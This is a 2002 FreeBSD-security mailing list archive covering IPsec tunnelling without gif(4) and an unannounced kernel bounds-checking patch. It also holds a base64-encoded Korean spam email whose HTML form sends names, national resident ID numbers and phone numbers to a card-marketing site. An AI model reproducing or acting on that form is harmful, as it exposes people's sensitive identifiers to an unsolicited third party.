From owner-freebsd-security Sun Aug 18 3:27:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 681F137B407 for ; Sun, 18 Aug 2002 03:27:03 -0700 (PDT) Received: from mxintern1.kundenserver.de (mxintern1.kundenserver.de [212.227.126.201]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2AB3543E65 for ; Sun, 18 Aug 2002 03:27:03 -0700 (PDT) (envelope-from kiesel@schlund.de) Received: from [172.17.29.6] (helo=alex.i.schlund.de) by mxintern1.kundenserver.de with smtp (Exim 3.35 #1) id 17gNGw-0004El-00 for freebsd-security@FreeBSD.ORG; Sun, 18 Aug 2002 12:27:02 +0200 Received: (qmail 23162 invoked by uid 519); 18 Aug 2002 10:27:01 -0000 Date: Sun, 18 Aug 2002 12:26:42 +0200 From: Alex Kiesel To: Borja Marcos Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG toipsec/racoontroubles, help please ...] Message-ID: <20020818102642.GA23114@schlund.de> References: <200208041224.10309.borjamar@sarenet.es> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200208041224.10309.borjamar@sarenet.es> User-Agent: Mutt/1.4i X-Binford: 6100 (more power) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Aug 04, 2002, Borja Marcos wrote: > On Friday 02 August 2002 23:47, Matthew Grooms wrote: > > Its only backwards if you are used to implimenting IPSEC communications > > in a non-giff'd confguration. As mentioned before, this is endorsed by > > many how-to's available. If you don't like this method, don't use it. I > > for one prefer the giffed alternative but will be more than happy to > > admit that the benifits appear to be mostly cosmetic. > > I am not using gif right now, but I see two important advantages. > > I suppose it will be possible to put firewall rules in a gif interface. > Imagine that you establish a tunnel with a not so trusted party, only for a > limited purpose. As I understand http://asherah.dyndns.org/~josh/ipsec-howto.txt, Topic 4: "The major change that is done is the use of the gif(4) device to get the routing correct. Note that traffic is *not* transported through the gif(4) tunnel! Instead the IPsec code in the kernel grabs the packets according to the specified policy and wraps them with the correct IP addresses for the IPsec tunnel. Effectively the packets receive new IP addresses which don't resemble a path through the gif tunnel." ... packets won't go through the gif-interface, so you cannot create firewall-rules based on the gif-interface (ok, you can - they won't get executed). Alex -- Alex Kiesel PGP Key: 0x09F4FA11 Schlund+Partner Entwicklung Unix The problem with troubleshooting is that trouble shoots back! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 18 7:30:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0DFD837B405 for ; Sun, 18 Aug 2002 07:30:23 -0700 (PDT) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9BCD943E6A for ; Sun, 18 Aug 2002 07:30:22 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 6C3B2555C for ; Sun, 18 Aug 2002 09:30:18 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g7IEUHO22360 for freebsd-security@freebsd.org; Sun, 18 Aug 2002 09:30:17 -0500 (CDT) (envelope-from hawkeyd) Date: Sun, 18 Aug 2002 09:30:17 -0500 From: D J Hawkey Jr To: security at FreeBSD Subject: Um, 4.6-RELEASE-p19? Message-ID: <20020818093013.A15126@sheol.localdomain> Reply-To: hawkeyd@visi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This I found in UPDATING, quite unintentionally: 20020813: p19 Bounds checking errors in accept(), getsockname(), getpeername(), and a VESA ioctl() command were corrected. It has no SA, nor was any notice sent. At five days, am I just being too impatient for an advisory? Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 18 7:35: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C72B37B400 for ; Sun, 18 Aug 2002 07:35:03 -0700 (PDT) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id D4BE043E42 for ; Sun, 18 Aug 2002 07:35:02 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 1A77754DC for ; Sun, 18 Aug 2002 09:35:02 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g7IEZ1G29970 for freebsd-security@freebsd.org; Sun, 18 Aug 2002 09:35:01 -0500 (CDT) (envelope-from hawkeyd) Date: Sun, 18 Aug 2002 09:35:01 -0500 From: D J Hawkey Jr To: security at FreeBSD Subject: Was "Um, 4.6-RELEASE-p19?", should be "4.5-RELEASE-p19?" Message-ID: <20020818093501.A26754@sheol.localdomain> Reply-To: hawkeyd@visi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry, I typo'ed the subject. I meant 4.5, not 4.6. Dave ----- Forwarded message from D J Hawkey Jr ----- Date: Sun, 18 Aug 2002 09:30:14 -0500 From: D J Hawkey Jr To: security at FreeBSD Subject: Um, 4.6-RELEASE-p19? Reply-To: hawkeyd@visi.com User-Agent: Mutt/1.2.5.1i This I found in UPDATING, quite unintentionally: 20020813: p19 Bounds checking errors in accept(), getsockname(), getpeername(), and a VESA ioctl() command were corrected. It has no SA, nor was any notice sent. At five days, am I just being too impatient for an advisory? Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ ----- End forwarded message ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 18 16:30:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9685F37B405 for ; Sun, 18 Aug 2002 16:30:41 -0700 (PDT) Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by mx1.FreeBSD.org (Postfix) with SMTP id 46B9F43E6A for ; Sun, 18 Aug 2002 16:30:40 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 7303 invoked by uid 1001); 18 Aug 2002 23:30:39 -0000 Date: Sun, 18 Aug 2002 19:30:39 -0400 From: "Peter C. Lai" To: D J Hawkey Jr Cc: security at FreeBSD Subject: Re: Um, 4.6-RELEASE-p19? Message-ID: <20020818233039.GA7293@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <20020818093013.A15126@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020818093013.A15126@sheol.localdomain> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is also what you get if you cvsup'd RELENG_4_6 (4.6.1-R-p11) prior to the new release. I wonder how it fits in with the version bump to 4.6.2 though. (does 4.6.2 == 4.6.1Rp11?) On Sun, Aug 18, 2002 at 09:30:17AM -0500, D J Hawkey Jr wrote: > This I found in UPDATING, quite unintentionally: > > 20020813: p19 > Bounds checking errors in accept(), getsockname(), > getpeername(), and a VESA ioctl() command were corrected. > > It has no SA, nor was any notice sent. At five days, am I just being too > impatient for an advisory? > > Dave > > -- > ______________________ ______________________ > \__________________ \ D. J. HAWKEY JR. / __________________/ > \________________/\ hawkeyd@visi.com /\________________/ > http://www.visi.com/~hawkeyd/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant Yale University School of Medicine Center for Medical Informatics | Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 18 23:21:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A46B237B400 for ; Sun, 18 Aug 2002 23:21:30 -0700 (PDT) Received: from accms33.physik.rwth-aachen.de (accms33.physik.RWTH-Aachen.DE [137.226.46.133]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9EF0543E42 for ; Sun, 18 Aug 2002 23:21:29 -0700 (PDT) (envelope-from kuku@accms33.physik.rwth-aachen.de) Received: (from kuku@localhost) by accms33.physik.rwth-aachen.de (8.9.3/8.9.3) id IAA12170 for security@freebsd.org; Mon, 19 Aug 2002 08:21:28 +0200 Date: Mon, 19 Aug 2002 08:21:28 +0200 From: "Christoph P. Kukulies" To: security@freebsd.org Subject: [postmaster@freebsd.org: Returned mail--"May 1999 05"] Message-ID: <20020819082128.A12153@gilberto.physik.rwth-aachen.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Just want to inform you of that email. Malicous background? -- Chris Christoph P. U. Kukulies kukulies@rwth-aachen.de ----- Forwarded message from postmaster ----- Date: Fri, 16 Aug 2002 20:03:22 +0200 (MEST) Date-warning: Date header was inserted by mail01.axelero.hu From: postmaster Subject: Returned mail--"May 1999 05" To: kuku@freebsd.org ----- End forwarded message ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 19 4:37: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 984D037B408 for ; Mon, 19 Aug 2002 04:36:15 -0700 (PDT) Received: from relay3.kornet.net (relay3.kornet.net [211.48.62.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4D8E543E42 for ; Mon, 19 Aug 2002 04:36:13 -0700 (PDT) (envelope-from ggaggung07@kornet.net) Received: from you2-8qqrs7eqb3 (61.73.135.119) by relay3.kornet.net; 19 Aug 2002 20:36:06 +0900 Message-ID: <3d60d82a3d62a5f4@relay3.kornet.net> (added by relay3.kornet.net) From: =?ks_c_5601-1987?B?x/a068SrteU=?= To: freebsd-security@freebsd.org Subject: =?ks_c_5601-1987?B?W7GksO1dIGZyZWVic2Qtc2VjdXJpdHm01CDH4L/uwMcgs9fA2SDFrLfOudm/zSC6ubHHwLsgteW4s7TPtNkh?= Date: Mon, 19 Aug 2002 19:44:00 +0900 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0197_01C0F44A.93A00C00" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0197_01C0F44A.93A00C00 Content-Type: text/plain; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 vcXDu7ytuN7Az8b7IA0KIA0KICAgDQogICAgICANCiANCiAgICAgCQkJICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICC8urjtICAJCSAgICAgwda5zrXut88gufjIoyAoIi0iwNS3 wikgDQogICAgICAgICAgICAgICAgICAgICAgICAgwffA5SDA/MitICAgICAgyN6068b5ICAN CiAgICAgICAgIA0KvcWx1CDIuL/4IL+syLi68SAguOnBpg0KIMf2tOsgwNq1v8L3ILG4wNS9 wyDG98DOxq4gx9LAziANCrG5s7vD1sPKIMHWwK8gurjH6Lmrt+EgsKHA1A0KIMGkuvEgwNq1 v8L3IL/rx7Agx9LAzg0KICAgICAgDQogIMf2tOsgIE0gxKu15Q0KICAgDQoNCiAgDQq9xbHU IMi4v/ggv6zIuLrxICC46cGmDQogseK+xiDA2rW/wvcgsbjA1L3DIMb3wM7GriDH0sDOIA0K sbmzu8PWw8ogwdbAryC6uMfouau34SCwocDUDQogwaS68SDA2rW/wvcgv+vHsCDH0sDODQog ICAgICAgseK+xiAgs+u67be5vboNCiAgIA0KDQogICANCsbyu/0gv6zIuLrxILjpwaYNCiDG 98DOxq6zs7rOLLD4sPqx3SDEq7XlsOHBpiC8rbrxvbogDQogx/a068GkwK8gp6QgtOcgNDC/ +CANCr+1yK0gv7m4xSDA5bTnIDIsMDAwv/ggx9LAziANCiAgICAgIA0KICBLVCAguvTHw7bz wNoNCiAgIA0KDQogIA0Ku+e/68fRIDAuNSW4piAgutK/7MDMv/S1vbHiDQogxvK7/SC/rMi4 uvEguOnBpiANCrHdwLa8rbrxvboNCiA1vu8guau34SC6uMfoIA0KDQoNCg0KICAgICAgILvn tvvAxyAgvNWw4cbsseINCiAgIA0KDQogICAgILHNx8/AxyAguN7Az8HWvNK0wiDApbytx87A uyDF68fYILz2wf3H0SCwzcDMuOcsILHXv9y/oSC+7rawx9EgwaS6uLW1ILCusO0gIMDWwfYg vsrAvcC7ILngyPy0z7TZLg0KICDAzCBFLW1haWzAuiC5373FwPy/68DMuOcsIL/4xKEgvsrA uL3HICCw5r/sIL7Gt6Egw6K/oSC43sDPwda80rimIMDUt8LHz7+pIMHWvcO46SC1ziC5+CC0 2b3DILjewM/AzCAgsKHB9iAgvsq1tbfPIMfPsNq9wLTPtNkuDQogICANCiAgICAgICAgICAg ICAgICAgICC6uyC43sDPwLogwaS6uMXrvcW6ziCxx7DtILvnx9e/oSDAx7DFIMGmuPG/oSBb saSw7V2287DtIMelvcO1yCCxpLDtILjewM/A1LTPtNkuDQogICAgICAgICAgICAgICAgICAg ICAgILn2xrDAuyDFrLivx8+9w7jpILz2vcWwxbrOw7O4rrChIMDMt+e+7iDB/bTPtNkuIA0K ICAgICAgICAgIElmIHlvdSB3b24ndCByZWNlaXZlIGFueSBtb3JlIG1haWwgYWJvdXQgdGhp cyBzaXRlLCANCiAgcHJlc3MgYnV0dG9uIGFuZCBmaWxsIHlvdXIgZS1tYWlsIGFkZHJlc3Mu IEFuZCB0aGVuIHdlIHdpbGwgbm90IHNlbmQgYW55IG1haWwgdG8geW91DQogICAgIA0KILq7 ILjewM/AuiDH9rTrxKu15byzsOi758DHICCws8DOIL+1vvcguN7Az8DUtM+02S4gILjewM+5 37zbwNogv6y29MOzIDogZW5leHRvcEBseWNvcy5jby5rciAgIA0KICANCiANCg== ------=_NextPart_000_0197_01C0F44A.93A00C00 Content-Type: text/html; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250 ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9ZXVjLWtyIj4NCjx0aXRsZT69xcO7vK243sDPxvsg PC90aXRsZT4NCjxTQ1JJUFQgbGFuZ3VhZ2U9amF2YXNjcmlwdD4NCjwhLS0NCmZ1bmN0aW9u IGNsaWNrTW91c2UoKQ0KCXsNCgkgIA0KCQlpZiAoKGV2ZW50LmJ1dHRvbj09MikgfHwgKGV2 ZW50LmJ1dHRvbj09Mykpew0KCQkJcmV0dXJuIChmYWxzZSk7DQoJCX0JDQoJfQ0KCQ0KCWZ1 bmN0aW9uIGNsaWNrS2V5KCkNCgl7DQoJCWlmKChldmVudC5zaGlmdEtleSkgJiYgKGV2ZW50 LmtleUNvZGUgPT0gMTIxKSkNCgkJewkJDQoJCQlyZXR1cm4gZmFsc2U7DQoJCX0JDQoJfQ0K CQ0KCWZ1bmN0aW9uIG5vQWN0aW9uKCl7DQoJCXJldHVybiBmYWxzZTsNCgl9DQoNCmRvY3Vt ZW50Lm9ubW91c2Vkb3duPWNsaWNrTW91c2UNCmRvY3VtZW50Lm9ua2V5ZG93bj1jbGlja0tl eQ0KZG9jdW1lbnQub25jb250ZXh0bWVudT1ub0FjdGlvbg0KZG9jdW1lbnQub25kcmFnc3Rh cnQ9bm9BY3Rpb24NCmRvY3VtZW50Lm9uc2VsZWN0c3RhcnQ9bm9BY3Rpb24NCi8vLS0+DQo8 L3NjcmlwdD4NCjwvaGVhZD4NCg0KPGJvZHkgYmdjb2xvcj0id2hpdGUiIHRleHQ9ImJsYWNr IiBsaW5rPSJibHVlIiB2bGluaz0icHVycGxlIiBhbGluaz0icmVkIj4NCjxwPiZuYnNwOzwv cD4NCjx0YWJsZSBhbGlnbj0iY2VudGVyIiBib3JkZXI9IjEiIGNlbGxzcGFjaW5nPSIwIiB3 aWR0aD0iNjMyIiBib3JkZXJjb2xvcmRhcms9IndoaXRlIiBib3JkZXJjb2xvcmxpZ2h0PSJi bGFjayIgYmdjb2xvcj0id2hpdGUiPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI5 NzQiPg0KICAgICAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGltZyBzcmM9Imh0dHA6Ly9p eWVzY2FyZC5jb20vaW1nL3RpdGxlXzMuZ2lmIiB3aWR0aD0iNjMyIiBoZWlnaHQ9IjE3NCIg Ym9yZGVyPSIwIj48L3A+DQogICAgICAgIDwvdGQ+DQogICAgPC90cj4NCiAgICA8dHI+DQog ICAgICAgIDx0ZCB3aWR0aD0iOTc0Ij4NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgICAg IDxwPiZuYnNwOzxpbWcgc3JjPSJodHRwOi8vaXllc2NhcmQuY29tL2ltZy9ib3R0b202Lmdp ZiIgd2lkdGg9IjYyMyIgaGVpZ2h0PSIyMTEiIGJvcmRlcj0iMCI+PC9wPg0KICAgICAgICAg ICAgPC9mb3JtPg0KICAgICAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgICAg ICA8dGQgd2lkdGg9Ijk3NCI+IA0KCQkJPGZvcm0gbmFtZT0ibWFpbGZybTEiIGFjdGlvbj0i aHR0cDovL3d3dy5peWVzY2FyZC5jb20vbWFpbC9pbnNlcnQxLmFzcCIgbWV0aG9kPSJwb3N0 IiA+DQogICAgICAgICAgICAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8Zm9udCBzaXplPSIy IiBjb2xvcj0iIzY2NjY2NiI+vLq47TwvZm9udD48Rk9OVCBzaXplPTI+ICANCiAgICAgICAg ICA8L0ZPTlQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im5hbWUiIHNpemU9IjYiPg0KCQkg ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxmb250IHNpemU9IjIiIGNvbG9yPSIjNjY2NjY2 Ij7B1rnOte63zyC5+MijIDwvZm9udD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ianVtaW4i IHNpemU9IjE0IiBtYXhsZW5ndGg9IjE0Ij48Zm9udCBzaXplPSIyIiBmYWNlPSKxvLiyIiBj b2xvcj0iIzY2NjY2NiI+KCZxdW90Oy0mcXVvdDvA1LfCKTwvZm9udD48Zm9udCBjb2xvcj0i Izk5OTk5OSI+DQogICAgICAgICAgPC9mb250Pjxicj4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGZvbnQgc2l6ZT0iMiIgY29sb3I9IiM2NjY2NjYiPsH3 wOUgwPzIrSAgDQogICAgICAgICAgPC9mb250PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ0 ZWxudW0iIHNpemU9IjEzIj4NCiAgICAgICAgICAmbmJzcDsmbmJzcDsmbmJzcDs8Zm9udCBz aXplPSIyIiBjb2xvcj0iIzY2NjY2NiI+yN6068b5IDwvZm9udD48Rk9OVCBzaXplPTI+PGlu cHV0IHR5cGU9InRleHQiIG5hbWU9ImhhbmRudW0iIHNpemU9IjE1Ij4NCiAgICAgICAgICA8 L0ZPTlQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iU3VibWl0MiIgdmFsdWU9Ir3Fw7si PjwvcD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvZm9ybT4NCiAgICAgICAgPC90ZD4N CiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI5NzQiPjxUQUJMRSBi b3JkZXJDb2xvcj13aGl0ZSBjZWxsU3BhY2luZz0wIA0KICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICBib3JkZXJDb2xvckRhcms9d2hpdGUgY2VsbFBhZGRpbmc9MCB3aWR0aD0i NjIxIiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWxpZ249Y2VudGVyIGJv cmRlckNvbG9yTGlnaHQ9IzAwNjY5OSBib3JkZXI9MT4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgPFRCT0RZPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8 VFI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0iMzI0Ij4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249bGVmdD48QlI+PElN RyBoZWlnaHQ9IjY2IiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJo dHRwOi8vaXllc2NhcmQuY29tL2ltZy9jYXJkX2ltZ18yMC5naWYiIHdpZHRoPSIxMDUiIA0K ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhbGlnbj1sZWZ0IGJvcmRlcj0wPjxJ TUcgaGVpZ2h0PTcgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0 cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gPFNQQU4gc3R5bGU9IkZPTlQtU0laRTog OXB0Ij69xbHUIMi4v/ggv6zIuLrxIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICC46cGmPEJSPjxJTUcgaGVpZ2h0PTcgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0K ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gx/a06yDA2rW/wvcg sbjA1L3DIMb3wM7GriDH0sDOIDxCUj48SU1HIGhlaWdodD03IA0KICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1nL2J1XzAxLmdp ZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYm9yZGVyPTA+ ILG5s7vD1sPKIMHWwK8gurjH6Lmrt+EgsKHA1DxCUj48SU1HIGhlaWdodD03IA0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9peWVzY2FyZC5jb20vaW1n L2J1XzAxLmdpZiIgd2lkdGg9NCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg Ym9yZGVyPTA+IMGkuvEgwNq1v8L3IL/rx7Agx9LAzjwvU1BBTj48L1A+DQogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIDxESVYgYWxpZ249bGVmdD4NCiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCBi b3JkZXI9MD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRCT0RZPg0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDxURCB3aWR0aD0xNTI+DQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIDxQPiZuYnNwOyZuYnNwOzxTUEFOIA0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPjxGT05UIGNvbG9yPSNjZDQ0MzM+PEI+ x/a06yANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSDEq7XlPC9CPjwvRk9O VD48L1NQQU4+PC9QPjwvVEQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxU RCB3aWR0aD0xNTI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxQIGFsaWdu PWxlZnQ+ICZuYnNwOzwvUD48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPjwvRElWPjwvVEQ+ DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0iMjkxIj4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFAgYWxpZ249bGVmdD48QlI+PElNRyBo ZWlnaHQ9IjYzIiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRw Oi8vaXllc2NhcmQuY29tL2ltZy9jYXJkX2ltZ18yMS5naWYiIHdpZHRoPSI5OSIgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFsaWduPWxlZnQgYm9yZGVyPTA+PElNRyBo ZWlnaHQ9NyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8v aXllc2NhcmQuY29tL2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIGJvcmRlcj0wPiA8U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiA5cHQi Pr3FsdQgyLi/+CC/rMi4uvEgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgILjp waY8QlI+PElNRyBoZWlnaHQ9NyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg c3JjPSJodHRwOi8vaXllc2NhcmQuY29tL2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJvcmRlcj0wPiCx4r7GJm5ic3A7wNq1v8L3 ILG4wNS9wyDG98DOxq4gx9LAziA8QlI+PElNRyANCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgaGVpZ2h0PTcgc3JjPSLAzLnMwfYvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gsbmzu8PWw8ogwdbAryC6 uMfouau34SCwocDUPEJSPjxJTUcgaGVpZ2h0PTcgDQogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0 aD00IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBib3JkZXI9MD4gwaS68SDA 2rW/wvcgv+vHsCDH0sDOPC9TUEFOPjwvUD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgPERJViBhbGlnbj1sZWZ0Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICA8VEFCTEUgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz0wIGJvcmRlcj0wPg0KICAgICAg 